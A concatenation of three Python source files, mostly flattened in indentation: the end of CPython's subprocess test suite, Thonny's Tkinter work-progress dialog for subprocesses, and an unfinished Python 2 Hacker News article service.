# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
        # Don't check the returncode value: the test already read the exit
        # status, so Popen could not read it and uses a default returncode
        # instead.
self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
        # bpo-40550: the process might exit between the returncode check and
# the kill operation
p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
# wait for process to exit
while not p.returncode:
p.poll()
with mock.patch.object(p, 'poll', new=lambda: None):
p.returncode = None
p.send_signal(signal.SIGTERM)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
        STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
            dwFlags=STARTF_USESHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
workdlg.py
|
import logging
import os
import queue
import signal
import subprocess
import threading
import time
import tkinter as tk
import tkinter.font  # makes tk.font.nametofont() below work even if nothing else has imported tkinter.font
from tkinter import ttk, messagebox
from typing import Optional
from thonny import tktextext
from thonny.languages import tr
from thonny.misc_utils import running_on_windows
from thonny.ui_utils import CommonDialog, ems_to_pixels, create_action_label, set_text_if_different
logger = logging.getLogger(__name__)
class WorkDialog(CommonDialog):
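    """Base dialog for running a longer job while showing its progress and log.
    Worker code (usually running on another thread) reports via the thread-safe
    helpers (append_text, report_progress, set_action_text, report_done), which
    queue events into _work_events_queue; the Tk thread drains that queue
    roughly every 200 ms in _keep_updating_ui()/update_ui().
    """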
def __init__(self, master, autostart=False):
super(WorkDialog, self).__init__(master)
self._autostart = autostart
self._state = "idle"
self.success = False
self._work_events_queue = queue.Queue()
self.init_instructions_frame()
self.init_main_frame()
self.init_action_frame()
self.init_log_frame()
self.populate_main_frame()
self.rowconfigure(4, weight=1) # log frame
self.columnconfigure(0, weight=1)
self.title(self.get_title())
self.stdout = ""
self.stderr = ""
self._update_scheduler = None
self._keep_updating_ui()
self.bind("<Escape>", self.on_cancel, True)
self.protocol("WM_DELETE_WINDOW", self.on_cancel)
if self._autostart:
self.on_ok()
def populate_main_frame(self):
pass
def is_ready_for_work(self):
return True
def init_instructions_frame(self):
instructions = self.get_instructions()
self.instructions_frame = ttk.Frame(self, style="Tip.TFrame")
self.instructions_frame.grid(row=0, column=0, sticky="nsew")
self.instructions_frame.rowconfigure(0, weight=1)
self.instructions_frame.columnconfigure(0, weight=1)
pad = self.get_padding()
self.instructions_label = ttk.Label(self, style="Tip.TLabel", text=instructions)
self.instructions_label.grid(row=0, column=0, sticky="w", padx=pad, pady=pad)
def get_instructions(self) -> Optional[str]:
return None
def init_main_frame(self):
self.main_frame = ttk.Frame(self)
self.main_frame.grid(row=1, column=0, sticky="nsew")
def init_action_frame(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self.action_frame = ttk.Frame(self)
self.action_frame.grid(row=2, column=0, sticky="nsew")
self._progress_bar = ttk.Progressbar(
self.action_frame, length=ems_to_pixels(4), mode="indeterminate"
)
self._current_action_label = create_action_label(
self.action_frame,
text="",
width=round(self.get_action_text_max_length() * 1.1),
click_handler=self.toggle_log_frame,
)
self._current_action_label.grid(
row=1, column=2, sticky="we", pady=padding, padx=(0, intpad)
)
self._ok_button = ttk.Button(
self.action_frame,
text=self.get_ok_text(),
command=self.on_ok,
state="disabled",
default="active",
)
if not self._autostart:
self._ok_button.grid(column=4, row=1, pady=padding, padx=(0, intpad))
self._cancel_button = ttk.Button(
self.action_frame,
text=self.get_cancel_text(),
command=self.on_cancel,
)
self._cancel_button.grid(column=5, row=1, padx=(0, padding), pady=padding)
self.action_frame.columnconfigure(2, weight=1)
def get_action_text_max_length(self):
return 35
def init_log_frame(self):
self.log_frame = ttk.Frame(self)
self.log_frame.columnconfigure(1, weight=1)
self.log_frame.rowconfigure(1, weight=1)
fixed_font = tk.font.nametofont("TkFixedFont")
font = fixed_font.copy()
font.configure(size=round(fixed_font.cget("size") * 0.8))
self.log_text = tktextext.TextFrame(
self.log_frame,
horizontal_scrollbar=False,
wrap="word",
borderwidth=1,
height=5,
width=20,
font=font,
read_only=True,
)
padding = self.get_padding()
self.log_text.grid(row=1, column=1, sticky="nsew", padx=padding, pady=(0, padding))
def update_ui(self):
if self._state == "closed":
return
while not self._work_events_queue.empty():
self.handle_work_event(*self._work_events_queue.get())
if self._state == "closed":
return
if self._state == "idle":
if self.is_ready_for_work():
self._ok_button.configure(state="normal")
else:
self._ok_button.configure(state="disabled")
else:
self._ok_button.configure(state="disabled")
if self._state == "done":
set_text_if_different(self._cancel_button, tr("Close"))
else:
set_text_if_different(self._cancel_button, tr("Cancel"))
def start_work(self):
pass
def get_title(self):
return "Work dialog"
def _keep_updating_ui(self):
if self._state != "closed":
self.update_ui()
self._update_scheduler = self.after(200, self._keep_updating_ui)
else:
self._update_scheduler = None
def close(self):
self._state = "closed"
if self._update_scheduler is not None:
try:
self.after_cancel(self._update_scheduler)
except tk.TclError:
pass
self.destroy()
def cancel_work(self):
# worker should periodically check this value
self._state = "cancelling"
self.set_action_text(tr("Cancelling"))
def toggle_log_frame(self, event=None):
if self.log_frame.winfo_ismapped():
self.log_frame.grid_forget()
self.rowconfigure(2, weight=1)
self.rowconfigure(4, weight=0)
else:
self.log_frame.grid(row=4, column=0, sticky="nsew")
self.rowconfigure(2, weight=0)
self.rowconfigure(4, weight=1)
def get_ok_text(self):
return tr("OK")
def get_cancel_text(self):
return tr("Cancel")
def on_ok(self, event=None):
assert self._state == "idle"
if self.start_work() is not False:
self._state = "working"
self.success = False
self.grid_progress_widgets()
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
if not self._current_action_label["text"]:
self._current_action_label["text"] = tr("Starting") + "..."
def grid_progress_widgets(self):
padding = self.get_padding()
intpad = self.get_internal_padding()
self._progress_bar.grid(row=1, column=1, sticky="w", padx=(padding, intpad), pady=padding)
def on_cancel(self, event=None):
if self._state in ("idle", "done"):
self.close()
elif self._state == "cancelling" and self.confirm_leaving_while_cancelling():
self.close()
elif self.confirm_cancel():
self.cancel_work()
def confirm_leaving_while_cancelling(self):
return messagebox.askyesno(
"Close dialog?",
"Cancelling is in progress.\nDo you still want to close the dialog?",
parent=self,
)
def confirm_cancel(self):
return messagebox.askyesno(
"Cancel work?",
"Are you sure you want to cancel?",
parent=self,
)
def append_text(self, text: str, stream_name="stdout") -> None:
"""Appends text to the details box. May be called from another thread."""
self._work_events_queue.put(("append", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def replace_last_line(self, text: str, stream_name="stdout") -> None:
"""Replaces last line in the details box. May be called from another thread."""
self._work_events_queue.put(("replace", (text, stream_name)))
setattr(self, stream_name, getattr(self, stream_name) + text)
def report_progress(self, value: float, maximum: float) -> None:
"""Updates progress bar. May be called from another thread."""
self._work_events_queue.put(("progress", (value, maximum)))
def set_action_text(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
self._work_events_queue.put(("action", (text,)))
def set_action_text_smart(self, text: str) -> None:
"""Updates text above the progress bar. May be called from another thread."""
text = text.strip()
if not text:
return
if len(text) > self.get_action_text_max_length():
text = text[: self.get_action_text_max_length() - 3] + "..."
self.set_action_text(text)
def report_done(self, success):
"""May be called from another thread."""
self._work_events_queue.put(("done", (success,)))
def handle_work_event(self, type, args):
if type in ("append", "replace"):
text, stream_name = args
if type == "replace":
self.log_text.text.direct_delete("end-1c linestart", "end-1c")
self.log_text.text.direct_insert("end", text, (stream_name,))
self.log_text.text.see("end")
elif type == "action":
set_text_if_different(self._current_action_label, args[0])
elif type == "progress":
value, maximum = args
if value is None or maximum is None:
if self._progress_bar["mode"] != "indeterminate":
self._progress_bar["mode"] = "indeterminate"
self._progress_bar.start()
else:
if self._progress_bar["mode"] != "determinate":
self._progress_bar["mode"] = "determinate"
self._progress_bar.stop()
self._progress_bar.configure(value=value, maximum=maximum)
elif type == "done":
self.on_done(args[0])
def on_done(self, success):
"""NB! Don't call from non-ui thread!"""
self.success = success
if self.success:
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
elif self._autostart:
# Can't try again if failed with autostart
self._state = "done"
self._cancel_button.focus_set()
self._cancel_button["default"] = "active"
self._ok_button["default"] = "normal"
else:
# allows trying again when failed
self._state = "idle"
self._ok_button.focus_set()
self._ok_button["default"] = "active"
self._cancel_button["default"] = "normal"
self._progress_bar.stop()
        # need to put it into determinate mode, otherwise it looks half done
self._progress_bar["mode"] = "determinate"
if self.success and self._autostart:
self.close()
class SubprocessDialog(WorkDialog):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(self, master, proc, title, long_description=None, autostart=True):
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self._title = title
self._long_description = long_description
self.returncode = None
super().__init__(master, autostart=autostart)
def is_ready_for_work(self):
return True
def get_title(self):
return self._title
def get_instructions(self) -> Optional[str]:
return self._long_description
def start_work(self):
self._start_listening_current_proc()
def _start_listening_current_proc(self):
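        # Start one daemon thread per stream that reads the subprocess output
        # line by line and forwards it to the UI via the work-events queue.
        # The stdout reader also finalizes the dialog (_finish_process) once
        # its stream reaches EOF.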
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
                # append_text() also records the text on self.<stream_name>
                self.append_text(data, stream_name)
                self._check_set_action_text_from_output_line(data)
if data == "":
logger.debug("Finished reading %s", stream_name)
break
if stream_name == "stdout":
self._finish_process()
logger.debug("Returning from reading %s", stream_name)
self._stdout_thread = threading.Thread(target=listen_stream, args=["stdout"], daemon=True)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def _finish_process(self):
self.returncode = self._proc.wait()
logger.debug("Process ended with returncode %s", self.returncode)
if self.returncode:
self.set_action_text("Error")
self.append_text("Error: process returned with code %s\n" % self.returncode)
else:
self.set_action_text("Done!")
self.append_text("Done!")
self.report_done(self.returncode == 0)
def get_action_text_max_length(self):
return 35
def _check_set_action_text_from_output_line(self, line):
if len(line) > self.get_action_text_max_length():
line = line[: self.get_action_text_max_length() - 3].strip() + "..."
if line:
self.set_action_text(line.strip())
def cancel_work(self):
super().cancel_work()
# try gently first
try:
try:
if running_on_windows():
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # pylint: disable=no-member
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
                    # now let's be more forceful
self._proc.kill()
except OSError as e:
messagebox.showerror("Error", "Could not kill subprocess: " + str(e), master=self)
logger.error("Could not kill subprocess", exc_info=e)
|
python_web_service.py
|
from hackernews import HackerNews
import json
import numpy as np
import unicodedata
import random
import string
import cherrypy
import Queue
import threading
class article:
url = ""
title = ""
article_id = 0
article_vector = None
mod_weight = 0.1
def __init__(self, url, title, article_id):
self.url = url
self.title = title
self.article_id = article_id
# create 1000 dimensional row vector, with entries between 0 and 1
random_vector = np.random.rand(1, 1000)
# normalize vector
vec_sum = np.sum(random_vector)
self.article_vector = random_vector / vec_sum
    # return the article as a JSON-friendly dict
def as_dict(self):
retValue = dict()
retValue['url'] = self.url
retValue['title'] = self.title
retValue['article_id'] = self.article_id
retValue['article_vector'] = np.array(self.article_vector).tolist()
return retValue
    # If a user whose user vector is user_vector clicks this article, modify the article vector as follows
def mod_article_vector(self, user_vector):
user_vector = self.mod_weight * user_vector
tmp_vector = self.article_vector + user_vector
tmp_vector = tmp_vector / (1 + self.mod_weight)
self.article_vector = tmp_vector
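
# A worked example of the update above (editor's note, values illustrative):
# with mod_weight = 0.1 and both vectors normalised to sum to 1,
#
#     new_vector = (article_vector + 0.1 * user_vector) / 1.1
#
# so sum(new_vector) = (1 + 0.1) / 1.1 = 1, i.e. the article vector stays
# normalised while drifting slightly toward the clicking user's vector.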
class pollArticles:
cached_articles = dict()
article_limit = 30
articles_as_json = json.loads('{}')
def getHN_stories(self, article_limit):
hn = HackerNews()
articles_to_retrieve = int(article_limit*1.5)
top_story_ids = hn.top_stories(limit=articles_to_retrieve)
stories = []
for story_id in top_story_ids:
stories.append(hn.get_item(story_id))
return stories
def HNstories_toArtList(self, stories, article_limit):
articles = []
counter = 0
for x in stories:
#print x
if counter == article_limit:
break
unicode_url = x.url
unicode_title = x.title
str_url = unicode_url.encode('ascii', 'ignore')
str_title = unicode_title.encode('ascii', 'ignore')
if str_url != "":
new_article = article(str_url, str_title, x.item_id)
articles.append(new_article)
counter += 1
return articles
def convertArticlesToArtDict(self, articles, cached_articles):
new_cached_articles = dict()
for art in articles:
            if art.article_id in cached_articles:
new_cached_articles[art.article_id] = cached_articles[art.article_id]
else:
new_cached_articles[art.article_id] = art
return new_cached_articles
def poll_articles(self):
hn_stories = self.getHN_stories(self.article_limit)
hn_articles = self.HNstories_toArtList(hn_stories, self.article_limit)
self.cached_articles = self.convertArticlesToArtDict(hn_articles, self.cached_articles)
self.save_articles_to_json()
def save_articles_to_json(self):
article_keys = self.cached_articles.keys()
article_list = []
for x in article_keys:
article_object = self.cached_articles[x]
article_list.append(article_object.as_dict())
#with open('./web/data/top_articles.json', 'w') as outfile:
# json.dump(article_list, outfile)
self.articles_as_json = json.dumps(article_list)
print ("LOL")
#TODO handle the case when the article_id does not exist server side
